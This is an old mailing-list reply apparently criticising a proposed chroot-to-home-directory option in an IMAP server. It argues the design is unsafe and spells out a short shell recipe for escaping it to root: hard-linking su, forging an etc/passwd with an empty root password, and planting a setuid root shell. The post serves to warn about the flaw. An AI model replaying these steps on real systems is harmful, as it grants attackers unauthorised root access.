On 956021099 seconds since the Beginning of the UNIX epoch
Mark Crispin wrote:
>
>The final form of the CHROOT_SERVER code, which will be an option in the next
>distributed version, consists of:
> if (chroot (home ? home : ANONYMOUSHOME)) return NIL;
> home = "/";
>And, yes, this will do the necessary chdir().
chroot(2)'ing to a users home directory is rather a bad idea in a lot of
setups. For example, assume that the machine has one large disk and one
partition. Then for a decent number of unices would be vulnerable (on a
shell enabled machine) to:
$ cd
$ mkdir etc
$ ln /usr/bin/su
$ cp /bin/sh .
$ cat root::... > etc/passwd
imap in, get into a chroot(2) jail ain your home dir, get a shell, su.
Then
# chmod 4755 sh
Using chroot in a lot of situations is rather dangerous, and one
must carefully set up the environment that it runs in.
IIRC, the default install of some unices/linuces is to have only one
partition.
== Roland Dowdeswell http://www.Imrryr.ORG/~elric/ ==
== The Unofficial NetBSD Web Pages http://www.Imrryr.ORG/NetBSD/ ==
== The NetBSD Project http://www.NetBSD.ORG/ ==
